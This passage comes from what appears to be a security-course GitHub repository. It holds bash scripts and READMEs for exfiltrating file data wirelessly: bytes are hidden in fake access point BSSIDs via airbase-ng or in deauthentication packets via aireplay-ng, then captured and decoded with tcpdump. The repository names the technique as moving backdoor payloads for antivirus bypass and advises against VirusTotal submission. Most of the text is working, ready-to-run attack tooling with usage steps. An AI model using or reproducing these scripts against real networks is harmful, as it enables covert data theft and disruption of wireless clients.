id="1" 490 | elif [ "$id" == "1" ] ; 491 | then 492 | Random1="1" 493 | id="2" 494 | elif [ "$id" == "2" ] ; 495 | then 496 | Random1="2" 497 | id="3" 498 | elif [ "$id" == "3" ] ; 499 | then 500 | Random1="3" 501 | id="4" 502 | elif [ "$id" == "4" ] ; 503 | then 504 | Random1="4" 505 | id="5" 506 | elif [ "$id" == "5" ] ; 507 | then 508 | Random1="5" 509 | id="6" 510 | elif [ "$id" == "6" ] ; 511 | then 512 | Random1="6" 513 | id="7" 514 | elif [ "$id" == "7" ] ; 515 | then 516 | Random1="7" 517 | id="8" 518 | elif [ "$id" == "8" ] ; 519 | then 520 | Random1="8" 521 | id="9" 522 | elif [ "$id" == "9" ] ; 523 | then 524 | Random1="9" 525 | id="a" 526 | elif [ "$id" == "a" ] ; 527 | then 528 | Random1="a" 529 | id="b" 530 | elif [ "$id" == "b" ] ; 531 | then 532 | Random1="b" 533 | id="c" 534 | elif [ "$id" == "c" ] ; 535 | then 536 | Random1="c" 537 | id="d" 538 | elif [ "$id" == "d" ] ; 539 | then 540 | Random1="d" 541 | id="e" 542 | elif [ "$id" == "e" ] ; 543 | then 544 | Random1="e" 545 | id="f" 546 | elif [ "$id" == "f" ] ; 547 | then 548 | Random1="f" 549 | id="0" 550 | fi 551 | #sleep 0.1 552 | tempaddress=`echo "0$Random1:$Exfil:20:20:20:20:20:20" | head -c17` 553 | sleep 0.2 554 | if [ "$6" == "fast" ] ; 555 | then 556 | echo "$(tput setaf 2)[!]:Sending [$(tput setaf 11)"$text"$(tput setaf 2)] via DeAuth.Cli.BSSID.[$(tput setaf 3)$tempaddress$(tput setaf 2)]" "to Target AP.[$(tput setaf 3)"$3"$(tput setaf 2)]$(tput setaf 10) Done." 557 | aireplay-ng -0 1 -a "$3" -c $tempaddress "$4" & 558 | sleep 0.2 559 | elif [ "$6" == "faster" ] ; 560 | then 561 | echo "$(tput setaf 2)[!]:Sending [$(tput setaf 11)"$text"$(tput setaf 2)] via DeAuth.Cli.BSSID.[$(tput setaf 3)$tempaddress$(tput setaf 2)]" "to Target AP.[$(tput setaf 3)"$3"$(tput setaf 2)]$(tput setaf 10) Done." 562 | aireplay-ng -0 1 -a "$3" -c $tempaddress "$4" & 563 | 564 | #if [ "$id" == "f" ]; 565 | #then 566 | #sleep 1.5 567 | #fi 568 | else 569 | Time=`date '+%d/%m/%Y %H:%M:%S'` 570 | echo "$(tput setaf 2)[!]:[$Time] Sending [$(tput setaf 11)"$text"$(tput setaf 2)] via DeAuth.Cli.BSSID.[$(tput setaf 3)$tempaddress$(tput setaf 2)]" "to Target AP.[$(tput setaf 3)"$3"$(tput setaf 2)]$(tput setaf 10) Done." 571 | sleep 0.2 572 | out=`aireplay-ng -0 1 -a "$3" -c $tempaddress "$4" | grep "Sending"` 573 | if [ "$6" == "dbg" ] ; 574 | then 575 | echo "$(tput setaf 14)$out" 576 | fi 577 | fi 578 | 579 | done 580 | 581 | tput setaf 6; 582 | Time=`date '+%d/%m/%Y %H:%M:%S'` 583 | echo "[>]:[$Time] Sending Finish Flag [00:ff:00:ff:00:ff] to AccessPoint: $3" 584 | aireplay-ng -0 1 -a "$3" -c "00:ff:00:ff:00:ff" "$4" | grep "error ;)" 585 | Time=`date '+%d/%m/%Y %H:%M:%S'` 586 | echo "[>]:[$Time] Exfiltration via Deauthentication Packets Done." 587 | fi 588 | ############################### ExfilDeauth v2 (Command-based send) ############################### 589 | 590 | ############################### ExfilDeauth v2 (Command-based receive) ############################### 591 | # ExfilDeauthDumps_CmdBased "fakev2" wlan1mon channel BSSID-optional 592 | function ExfilDeauthDumps_CmdBased 593 | { 594 | nohup killall airbase-ng > "kill.txt" 2>&1 & 595 | nohup killall tcpdump > "kill.txt" 2>&1 & 596 | tput setaf 2; 597 | FakeAp="$1"; 598 | defaultBSSID="$4" 599 | if [[ "$1" == "" || "$1" == " " ]] 600 | then 601 | FakeAp="DefaultFakeAP"; 602 | fi 603 | if [ "$4" == "" ] 604 | then 605 | defaultBSSID="00:11:22:33:44:55" 606 | fi 607 | 608 | Time=`date '+%d/%m/%Y %H:%M:%S'` 609 | echo "$(tput setaf 2)[>]:[$Time]:Default AP.BSSID.[$(tput setaf 3)$defaultBSSID$(tput setaf 2)]:$(tput setaf 10)Created$(tput setaf 2)" 610 | nohup airbase-ng -a "$defaultBSSID" --essid "$FakeAp" -I 10 -0 "$2" -c "$3" > "airbase_output.txt" 2>&1 & 611 | Time=`date '+%d/%m/%Y %H:%M:%S'` 612 | echo "$(tput setaf 2)[>]:[$Time]:Default AP.ESSID.[$(tput setaf 3)$FakeAp$(tput setaf 2)] with Wifi Channel.[$(tput setaf 3)$3$(tput setaf 2)] via Interface.[$(tput setaf 3)$2$(tput setaf 2)]:$(tput setaf 10)Started$(tput setaf 2)" 613 | tput setaf 10; 614 | sleep 1.5 615 | out=`nohup tcpdump -i "$2" -n | grep "DeAuthentication" > "DeauthPayloadDumps.txt" &` 616 | sleep 1 617 | counter=0 618 | while true 619 | do 620 | Time=`date '+%d/%m/%Y %H:%M:%S'` 621 | echo "$(tput setaf 2)[>]:[$Time]:$(tput setaf 3)$2$(tput setaf 2) Packet Monitoring for DeAuthentication Traffic:$(tput setaf 10)Started$(tput setaf 2)" 622 | printf "[>]:[$Time]:$(tput setaf 3)$2$(tput setaf 2) Packet Monitoring " 623 | while true 624 | do 625 | tput setaf 3; 626 | if (( $counter > 3 )) 627 | then 628 | printf '.' 629 | counter=0 630 | fi 631 | tput setaf 2; 632 | FinishFlag=`strings "DeauthPayloadDumps.txt" | grep "00:ff:00:ff:00:ff"` 633 | if (( `echo ${#FinishFlag}` !=0 )) 634 | then 635 | tput setaf 10; 636 | Time=`date '+%d/%m/%Y %H:%M:%S'` 637 | echo "" 638 | echo "$(tput setaf 2)[!]:[$Time]:Finish Flag:$(tput setaf 10)Detected$(tput setaf 2)" 639 | break; 640 | fi 641 | ((counter++)) 642 | sleep 3.5 643 | done 644 | # `strings "DeauthPayloadDumps.txt" | awk {'print $12'} | awk '!a[$0]++' | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g' | sed 's/00:11:22:33:44:55//g' | sed 's/00://g' | sed 's/01://g' | sed 's/02://g' | sed 's/03://g' | sed 's/04://g' | sed 's/05://g' | sed 's/06://g' | sed 's/07://g' | sed 's/08://g' | sed 's/09://g' | sed 's/0a://g' | sed 's/0b://g' | sed 's/0c://g' | sed 's/0d://g' | sed 's/0e://g' | sed 's/0f://g' > "DeAuthbytes1.txt" ` 645 | `strings "DeauthPayloadDumps.txt" | awk {'print $12'} | awk '!a[$0]++' | sed "s/$defaultBSSID//g" | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g' | sed 's/00:11:22:33:44:55//g' | sed 's/00://g' | sed 's/01://g' | sed 's/02://g' | sed 's/03://g' | sed 's/04://g' | sed 's/05://g' | sed 's/06://g' | sed 's/07://g' | sed 's/08://g' | sed 's/09://g' | sed 's/0a://g' | sed 's/0b://g' | sed 's/0c://g' | sed 's/0d://g' | sed 's/0e://g' | sed 's/0f://g' | xxd -r -p > "DeAuthbytes.txt" ` 646 | payload=`cat DeAuthbytes.txt` 647 | Time=`date '+%d/%m/%Y %H:%M:%S'` 648 | echo "$(tput setaf 2)[!]:[$Time]:Payload Dumping:$(tput setaf 10)Done$(tput setaf 2)." 649 | echo "$(tput setaf 2)[!]:[$Time]:Text/Data Dumped:$(tput setaf 11) $payload$(tput setaf 2)" 650 | nohup killall tcpdump > "kill.txt" 2>&1 & 651 | Timestr=`date '+%d-%m-%Y.%H-%M-%S'` 652 | echo " " > "ExfilOutput_$Timestr.txt" 653 | echo $payload > "ExfilOutput_$Timestr.txt" 654 | echo "$(tput setaf 2)[>]:[$Time]:Text/Data Saved to $(tput setaf 10)\"ExfilOutput_$Timestr.txt\"$(tput setaf 2)" 655 | tput setaf 2; 656 | sleep 0.5; 657 | echo "" > "DeauthPayloadDumps.txt" 658 | sleep 0.5; 659 | tput setaf 10; 660 | `nohup tcpdump -i "$2" -n | grep "DeAuthentication" > "DeauthPayloadDumps.txt" 2>&1 & ` 661 | done 662 | } 663 | ############################### ExfilDeauth v2 (Command-based receive) ############################### 664 | 665 | if [ $1 == "-deauthdumps" ] 666 | then 667 | # ExfilDeauthDumps_CmdBased "fakev2" wlan1mon channel 668 | ExfilDeauthDumps_CmdBased "$2" "$3" "$4" "$5" 669 | fi 670 | 671 | if [ $1 == "help" ] 672 | then 673 | tput setaf 2; 674 | echo "$(tput setaf 10)--------------------------------------------------------" 675 | echo "$(tput setaf 2)NativePayload_BSSID.sh$(tput setaf 11) v1 $(tput setaf 2)Syntax: " 676 | echo 677 | echo "$(tput setaf 3)Step1 (Client Side):" 678 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -f $(tput setaf 14)[text-file] $(tput setaf 6)[Fake-AP-Name] $(tput setaf 11)[MonitorMode-Interface]" 679 | echo "$(tput setaf 2)Example [System A]:$(tput setaf 10)./NativePayload_BSSID.sh -f $(tput setaf 14)mytext.txt $(tput setaf 6)myfakeAP $(tput setaf 11)Wlan3mon" 680 | echo 681 | echo "$(tput setaf 3)Step2 (Server Side):" 682 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -s $(tput setaf 14)[Wifi-Interface] $(tput setaf 6)[Exfil-Dump-file]" 683 | echo "$(tput setaf 2)Example [System B]:$(tput setaf 10)./NativePayload_BSSID.sh -s $(tput setaf 14)wlan0 $(tput setaf 6)ExfilDumped.txt" 684 | echo 685 | echo "$(tput setaf 3)Description:$(tput setaf 2) with Step1 (system A) you will inject bytes for (mytext.txt) file to BSSID for Fake AP in this case (myfakeAP) , with Step2 on (system B) you can have this text file via Scanning Fake AP on AIR by Wireless traffic (Using iwlist tool)" 686 | echo "Note : before step1 you should make Monitor-Mode Interface (WlanXmon) by this command for example : $(tput setaf 10)airmon-ng start wlan3 " 687 | echo "$(tput setaf 10)--------------------------------------------------------" 688 | echo "$(tput setaf 2)NativePayload_BSSID.sh$(tput setaf 11) v2 $(tput setaf 2)Syntax I: " 689 | echo 690 | echo "$(tput setaf 3)Step1 (Server Side):" 691 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -deauthdumps $(tput setaf 14)[FakeAP-ESSID] $(tput setaf 6)[MonitorMode-Interface]$(tput setaf 11) [Wifi-Channel] $(tput setaf 3)[FakeAP-BSSID]" 692 | echo "$(tput setaf 2)Example [System B]:$(tput setaf 10)./NativePayload_BSSID.sh -deauthdumps $(tput setaf 14)MyFakeAP $(tput setaf 6)wlan1mon$(tput setaf 11) 7 $(tput setaf 3)00:12:32:44:64:19" 693 | echo 694 | echo "$(tput setaf 3)Step2 (Client Side):" 695 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -exfildeauth $(tput setaf 14)[text-file] $(tput setaf 6)[Target-FakeAP-BSSID] $(tput setaf 11)[Wifi-Interface] $(tput setaf 3)[Wifi-Channel] $(tput setaf 4)[dbg]/[fast]/[faster]" 696 | echo "$(tput setaf 2)Example [System A]:$(tput setaf 10)./NativePayload_BSSID.sh -exfildeauth $(tput setaf 14)mypayload.txt $(tput setaf 6)00:12:32:44:64:19 $(tput setaf 11)wlan2 $(tput setaf 3)7 $(tput setaf 4)faster" 697 | echo 698 | echo "$(tput setaf 3)Description:$(tput setaf 2) with Step1 (system B) you will have Fake AP via wlanXmon interface also DeAuth Packets will Dump via Tcpdump tool in this step in server side , Note: before step1 you should make WlanXmon Monitor-Mode Interface by this command : $(tput setaf 10)airmon-ng start wlanX " 699 | echo "$(tput setaf 2)with Step2 your Client (system A) will send that text file to (Target/system B) via DeAuth Packets On AIR Directly..." 700 | echo "Note: $(tput setaf 10)via Step2 your Payload Injected to Client.BSSIDs in DeAuth Packets." 701 | echo "$(tput setaf 10)--------------------------------------------------------" 702 | echo "$(tput setaf 2)NativePayload_BSSID.sh$(tput setaf 11) v2 $(tput setaf 2)Syntax II: " 703 | echo "$(tput setaf 3)(Server/Client Side):" 704 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -exfilserver" 705 | echo "$(tput setaf 3)Description:$(tput setaf 2) for more information please read PDF/Article on Github..." 706 | echo "$(tput setaf 10)--------------------------------------------------------" 707 | 708 | fi 709 | 710 | # myrecords="" 711 | # ChatInputArray=() 712 | # base64isonoff="false" 713 | # isb64="false" 714 | # iscmdshellonoff="off" 715 | isdebug="off" 716 | ExfilMode="bssid" 717 | server_client_Mode="server" 718 | 719 | if [ $1 == "-exfilserver" ]; 720 | then 721 | 722 | while [ "$input" != "exit" ] 723 | do 724 | while true ; 725 | do 726 | 727 | if [ $ExfilMode == "bssid" ] ; 728 | then 729 | 730 | if [ "$server_client_Mode" == "client" ] 731 | then 732 | read -p "$(tput setaf 2)[>]:WIFI::Chat:input:[$(tput setaf 3)Client$(tput setaf 2)][$(tput setaf 3)BSSID$(tput setaf 2)]#$(tput setaf 11) " input 733 | else 734 | read -p "$(tput setaf 2)[>]:WIFI::Chat:input:[$(tput setaf 3)Server$(tput setaf 2)][$(tput setaf 3)BSSID$(tput setaf 2)]#$(tput setaf 11) " input 735 | fi 736 | else 737 | 738 | if [ "$server_client_Mode" == "client" ] 739 | then 740 | read -p "$(tput setaf 2)[>]:WIFI::Chat:input:[$(tput setaf 3)Client$(tput setaf 2)][$(tput setaf 3)DeAuth$(tput setaf 2)]#$(tput setaf 11) " input 741 | else 742 | read -p "$(tput setaf 2)[>]:WIFI::Chat:input:[$(tput setaf 3)Server$(tput setaf 2)][$(tput setaf 3)DeAuth$(tput setaf 2)]#$(tput setaf 11) " input 743 | fi 744 | fi 745 | tput setaf 2 746 | if [[ $input == "@exit" ]] 747 | then 748 | exit ; 749 | elif [[ "$input" == "@clear" ]] ; 750 | then 751 | clear ; 752 | elif [[ "$input" == "@help" ]] ; 753 | then 754 | _help "$server_client_Mode" ; 755 | elif [[ "$input" == "@clientmode" || "$input" == "@cli" ]] ; 756 | then 757 | tput setaf 10 758 | echo "[@]:ChatMode::Client.Mode:On" 759 | tput setaf 2 760 | server_client_Mode="client" 761 | elif [[ "$input" == "@servermode" || "$input" == "@serv" ]] ; 762 | then 763 | tput setaf 10 764 | echo "[@]:ChatMode::Server.Mode:On" 765 | nohup killall airbase-ng > "killairbase.txt" 2>&1 & 766 | tput setaf 2 767 | server_client_Mode="server" 768 | elif [[ "$input" == "@run" ]] ; 769 | then 770 | if [ "$server_client_Mode" == "server" ] 771 | then 772 | tput setaf 10 773 | if [ "$ExfilMode" == "bssid" ] 774 | then 775 | echo "[@]:ChatMode::ServerSide.[Bssid].Scanning.AccessPoints:Started" 776 | break; 777 | else 778 | echo "[@]:ChatMode::ServerSide.[DeAuth].Scanning.Mode:Started" 779 | break; 780 | fi 781 | else 782 | tput setaf 10 783 | echo "[@]:this command supported in [ServerSide] only" 784 | fi 785 | tput setaf 2 786 | elif [[ "$input" == "@dbgon" ]] ; 787 | then 788 | tput setaf 10 789 | echo "[@]:ChatMode::Debug.ShowDetails:On" 790 | tput setaf 2 791 | isdebug="on" 792 | elif [[ "$input" == "@dbgoff" ]] ; 793 | then 794 | tput setaf 10 795 | echo "[@]:ChatMode::Debug.ShowDetails:Off" 796 | tput setaf 2 797 | isdebug="off" 798 | elif [[ "$input" == "@bssid" || "$input" == "bssid" ]] ; 799 | then 800 | tput setaf 10 801 | ExfilMode="bssid" 802 | echo "[@]:ChatMode::SendbyBSSID:On" 803 | tput setaf 2 804 | elif [[ "$input" == "@deauth" ]] ; 805 | then 806 | tput setaf 10 807 | ExfilMode="deauth" 808 | echo "[@]:ChatMode::SendbyDeAuth:On" 809 | tput setaf 2 810 | elif [[ $input != '' && $input != "@"* && "$server_client_Mode" == "client" ]] ; 811 | then 812 | break; 813 | elif [[ $input != '' && $input == "@run" && "$server_client_Mode" == "server" ]] ; 814 | then 815 | break; 816 | else 817 | Again="Again;)" 818 | fi 819 | done 820 | 821 | if [ "$ExfilMode" == "bssid" ] 822 | then 823 | if [ "$server_client_Mode" == "client" ] 824 | then 825 | if [ "$isdebug" == "off" ] 826 | then 827 | 828 | nohup killall airbase-ng > "kill.txt" 2>&1 & 829 | while true ; 830 | do 831 | read -p "$(tput setaf 2)[>]:WIFI::Monitor.Mode.[Interface]:input:[$(tput setaf 3)wlan0mon$(tput setaf 2)]#$(tput setaf 11) " input2 832 | if [ "$input2" != '' ] 833 | then 834 | break 835 | fi 836 | done 837 | sendBssids "$input" "fake" "$input2" "false" 838 | else 839 | nohup killall airbase-ng > "kill.txt" 2>&1 & 840 | while true ; 841 | do 842 | read -p "$(tput setaf 2)[>]:WIFI::Monitor.Mode.[Interface]:input:[$(tput setaf 3)wlan0mon$(tput setaf 2)]#$(tput setaf 11) " input2 843 | if [ "$input2" != '' ] 844 | then 845 | break 846 | fi 847 | done 848 | sendBssids "$input" "fake" "$input2" "true" 849 | fi 850 | else 851 | if [ "$isdebug" == "off" ] 852 | then 853 | while true ; 854 | do 855 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Interface]:input:[$(tput setaf 3)wlan0$(tput setaf 2)]#$(tput setaf 11) " input2 856 | if [ "$input2" != '' ] 857 | then 858 | break 859 | fi 860 | done 861 | receiveBssids "$input2" "myExfildump.txt" "false" 862 | else 863 | while true ; 864 | do 865 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Interface]:input:[$(tput setaf 3)wlan0$(tput setaf 2)]#$(tput setaf 11) " input2 866 | if [ "$input2" != '' ] 867 | then 868 | break 869 | fi 870 | done 871 | receiveBssids "$input2" "myExfildump.txt" "true" 872 | fi 873 | 874 | fi 875 | 876 | fi 877 | if [ "$ExfilMode" == "deauth" ] 878 | then 879 | if [ "$server_client_Mode" == "client" ] 880 | then 881 | if [ "$isdebug" == "off" ] 882 | then 883 | while true ; 884 | do 885 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Interface]:input:[$(tput setaf 3)wlan0$(tput setaf 2)]#$(tput setaf 11) " wlan_input2 886 | if [ "$wlan_input2" != '' ] 887 | then 888 | break 889 | fi 890 | done 891 | while true ; 892 | do 893 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Channel]:input:[$(tput setaf 3)1$(tput setaf 2)]#$(tput setaf 11) " channel_input3 894 | if [ "$channel_input3" != '' ] 895 | then 896 | break 897 | fi 898 | done 899 | ExfilDeauth "$input" "00:11:22:33:44:55" "$wlan_input2" "$channel_input3" "false" 900 | else 901 | while true ; 902 | do 903 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Interface]:input:[$(tput setaf 3)wlan0$(tput setaf 2)]#$(tput setaf 11) " wlan_input2 904 | if [ "$wlan_input2" != '' ] 905 | then 906 | break 907 | fi 908 | done 909 | while true ; 910 | do 911 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Channel]:input:[$(tput setaf 3)1$(tput setaf 2)]#$(tput setaf 11) " channel_input3 912 | if [ "$channel_input3" != '' ] 913 | then 914 | break 915 | fi 916 | done 917 | ExfilDeauth "$input" "00:11:22:33:44:55" "$wlan_input2" "$channel_input3" "true" 918 | fi 919 | else 920 | if [ "$isdebug" == "off" ] 921 | then 922 | while true ; 923 | do 924 | read -p "$(tput setaf 2)[>]:WIFI::WlanMon.[Interface]:input:[$(tput setaf 3)wlan1mon$(tput setaf 2)]#$(tput setaf 11) " wlanmon_input2 925 | if [ "$wlanmon_input2" != '' ] 926 | then 927 | break 928 | fi 929 | done 930 | while true ; 931 | do 932 | read -p "$(tput setaf 2)[>]:WIFI::WlanMon.[Channel]:input:[$(tput setaf 3)1$(tput setaf 2)]#$(tput setaf 11) " channelmon_input3 933 | if [ "$channelmon_input3" != '' ] 934 | then 935 | break 936 | fi 937 | done 938 | ExfilDeauthDumps "" "$wlanmon_input2" "$channelmon_input3" "false" 939 | else 940 | while true ; 941 | do 942 | read -p "$(tput setaf 2)[>]:WIFI::WlanMon.[Interface]:input:[$(tput setaf 3)wlan1mon$(tput setaf 2)]#$(tput setaf 11) " wlanmon_input2 943 | if [ "$wlanmon_input2" != '' ] 944 | then 945 | break 946 | fi 947 | done 948 | while true ; 949 | do 950 | read -p "$(tput setaf 2)[>]:WIFI::WlanMon.[Channel]:input:[$(tput setaf 3)1$(tput setaf 2)]#$(tput setaf 11) " channelmon_input3 951 | if [ "$channelmon_input3" != '' ] 952 | then 953 | break 954 | fi 955 | done 956 | ExfilDeauthDumps "" "$wlanmon_input2" "$channelmon_input3" "true" 957 | fi 958 | 959 | fi 960 | fi 961 | 962 | done 963 | fi 964 | ################################################## version 2 ################################################## 965 | -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/README.md: -------------------------------------------------------------------------------- 1 | # NativePayload_BSSID.sh v2 2 | 3 | Exfiltration via Wireless DeAuthentication Packets from Client to Server on AIR (without user-pass or Wifi Connection & very fast) 4 | 5 | Note: this code tested in kali linux systems (only). 6 | 7 | Article/Pdf and New video will Publish here soon... 8 | 9 | Video[1] , NativePayload_BSSID.sh v2 (step by step) : https://www.youtube.com/watch?v=rg-O4RKt9OA 10 | 11 | as you can see in this "Picture 1", with this switch "help" you can see Help information : ./NativePayload_BSSID.sh help 12 | 13 | ![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSIDv2/NativePayload_BSSID%20help.png) 14 | Picture 1: 15 | 16 | # NativePayload_BSSID.sh (help): 17 | 18 | NativePayload_BSSID.sh v1 Syntax: 19 | 20 | Step1 (Client Side): 21 | Syntax :./NativePayload_BSSID.sh -f [text-file] [Fake-AP-Name] [MonitorMode-Interface] 22 | Example [System A]:./NativePayload_BSSID.sh -f mytext.txt myfakeAP Wlan3mon 23 | 24 | Step2 (Server Side): 25 | Syntax :./NativePayload_BSSID.sh -s [Wifi-Interface] [Exfil-Dump-file] 26 | Example [System B]:./NativePayload_BSSID.sh -s wlan0 ExfilDumped.txt 27 | 28 | Description: with Step1 (system A) you will inject bytes for (mytext.txt) file to BSSID for Fake AP in this case (myfakeAP) , 29 | with Step2 on (system B) you can have this text file via Scanning Fake AP on AIR by Wireless traffic (Using iwlist tool) 30 | Note : before step1 you should make Monitor-Mode Interface (WlanXmon) by this command for example : airmon-ng start wlan3 31 | -------------------------------------------------------- 32 | NativePayload_BSSID.sh v2 Syntax I: 33 | 34 | Step1 (Server Side): 35 | Syntax :./NativePayload_BSSID.sh -deauthdumps [FakeAP-ESSID] [MonitorMode-Interface] [Wifi-Channel] [FakeAP-BSSID] 36 | Example [System B]:./NativePayload_BSSID.sh -deauthdumps MyFakeAP wlan1mon 7 00:12:32:44:64:19 37 | 38 | Step2 (Client Side): 39 | Syntax :./NativePayload_BSSID.sh -exfildeauth [text-file] [Target-FakeAP-BSSID] [Wifi-Interface] [Wifi-Channel] [dbg]/[fast]/[faster] 40 | Example [System A]:./NativePayload_BSSID.sh -exfildeauth mypayload.txt 00:12:32:44:64:19 wlan2 7 faster 41 | 42 | Description: with Step1 (system B) you will have Fake AP via wlanXmon interface also DeAuth Packets will Dump via Tcpdump 43 | tool in this step in server side , 44 | Note: before step1 you should make WlanXmon Monitor-Mode Interface by this command : airmon-ng start wlanX 45 | with Step2 your Client (system A) will send that text file to (Target/system B) via DeAuth Packets On AIR Directly... 46 | note: via Step2 your Payload Injected to Client.BSSIDs in DeAuth Packets. 47 | -------------------------------------------------------- 48 | NativePayload_BSSID.sh v2 Syntax II: 49 | 50 | (Server/Client Side): 51 | Syntax :./NativePayload_BSSID.sh -exfilserver 52 | Description: for more information please read PDF/Article on Github... (soon) 53 | -------------------------------------------------------- 54 | 55 | -------------------------------------------------------------------------------------- 56 | 57 | # NativePayload_BSSID.sh v2 58 | # and DeAuth Method (step by step): 59 | 60 | Step 1 : 61 | with switch "-deauthdumps" you will have Fake AP via wlanXmon interface also DeAuth Packets will Dump via Tcpdump 62 | tool in this step in server side. 63 | 64 | Note: before step1 you should make WlanXmon Monitor-Mode Interface by this command : airmon-ng start wlanX 65 | 66 | Step1 (Server Side): 67 | Example [System B]:./NativePayload_BSSID.sh -deauthdumps MyFakeAP wlan1mon 7 00:12:32:44:64:19 68 | 69 | 70 | ![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSIDv2/NativePayload_BSSID%20Step1.png) 71 | Picture 2: 72 | 73 | Step 2 : 74 | with Step2 your Client (system A) will send that text file to (Target/system B) via DeAuth Packets On AIR Directly... 75 | note: via Step2 your Payload Injected to Client.BSSIDs in DeAuth Packets. 76 | 77 | Step2 (Client Side): 78 | Example [System A]:./NativePayload_BSSID.sh -exfildeauth mypayload.txt 00:12:32:44:64:19 wlan2 7 faster 79 | 80 | ![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSIDv2/NativePayload_BSSID%20Step2.png) 81 | Picture 3: 82 | 83 | as you can see in "Picture 4" after 5 seconds that text file "3.txt" Exfiltrated from client to server on AIR ,(very simple). 84 | 85 | ![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSIDv2/NativePayload_BSSID%20Step4.png) 86 | Picture 4: 87 | 88 | Article and Pdf File will Publish here soon... 89 | 90 | Video STEP BY STEP : https://www.youtube.com/watch?v=rg-O4RKt9OA 91 | 92 | -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/README.md: -------------------------------------------------------------------------------- 1 | # Course : Bypassing Anti Viruses by C#.NET Programming 2 | 3 | Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 9 : Transferring Backdoor Payload by Wireless Traffic (BSSID) 4 | 5 | eBook : Bypassing Anti Viruses by C#.NET Programming 6 | 7 | eBook chapter 9 , PDF Download : https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/tree/master/CH9 8 | 9 | Related Video : 10 | 11 | Video 1 C# Code : https://youtu.be/W0dJGln3tls 12 | 13 | Video 2 Script Code : https://www.youtube.com/watch?v=i6Y5BmJXWko 14 | 15 | 16 | Warning :Don't Use "www.virustotal.com" or something like that , Never Ever ;D 17 | 18 | Recommended: 19 | 20 | STEP 1 : Use each AV one by one in your LAB . 21 | 22 | STEP 2 : after "AV Signature Database Updated" your Internet Connection should be "Disconnect" . 23 | 24 | STEP 3 : Now you can Copy and Paste your C# code to your Virtual Machine for test . 25 | 26 | # NativePayload_BSSID.sh help : 27 | 28 | Example Step1: (Client Side ) ./NativePayload_BSSID.sh -f text-file Fake-AP-Name MonitorMode-Interface 29 | 30 | Example Step2: (Server Side ) ./NativePayload_BSSID.sh -s wlanx Exfil-Dump-file 31 | 32 | example System A : ./NativePayload_BSSID.sh -f mytext.txt myfakeAP Wlan3mon 33 | 34 | example System B : ./NativePayload_BSSID.sh -s wlan0 ExfilDumped.txt 35 | 36 | Description: with Step1 (system A) you will inject bytes for (mytext.txt) file to BSSID for Fake AP in this case (myfakeAP) , with Step2 on (system B) you can have this text file via Scanning Fake AP on AIR by Wireless traffic (Using iwlist tool) 37 | 38 | Note : before step1 you should make MonitorMode Interface (WlanXmon) by this command for example : airmon-ng start wlan3 39 | 40 | 41 | ![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSID1.png) 42 | 43 | ![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSID2.png) 44 | -------------------------------------------------------------------------------- /EBOOK/Client_Exfiltration_via_FakeAP.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo " #!/bin/sh" 3 | for bytes in `xxd -p -c 5 $1 | sed 's/../&:/g'`; 4 | do 5 | Exfil=`echo $bytes | sed 's/:$/ /'` 6 | text=`echo $Exfil | xxd -r -p` 7 | echo "#Injecting text: " \"$text\" "to Mac via BSSID" 00:$Exfil "for FAKE AccessPoint: " $2 8 | echo "airbase-ng -a " 00:$Exfil " --essid" $2 "-I 10 -0 " $3 " ;" 9 | echo 10 | done 11 | -------------------------------------------------------------------------------- /EBOOK/Client_killAP.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | c=1 3 | while [ $c -le $1 ] 4 | do 5 | sleep 10 ; 6 | killall airbase-ng ; 7 | echo $c "Killing airbase-ng Process Done"; 8 | ((c++)) 9 | done 10 | 11 | -------------------------------------------------------------------------------- /EBOOK/GetData.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/EBOOK/GetData.png -------------------------------------------------------------------------------- /EBOOK/README.md: -------------------------------------------------------------------------------- 1 | # Simple Linux Scripts for Transferring/Exfiltration DATA via BSSID and Wireless Traffic 2 | 3 | For More Information and Use These Scripts Step by Step Please Read This Article : 4 | 5 | Article : https://www.peerlyst.com/posts/linux-systems-and-data-transferring-exfiltration-via-bssid-by-wireless-traffic-damon-mohammadbagher 6 | 7 | Related Article : 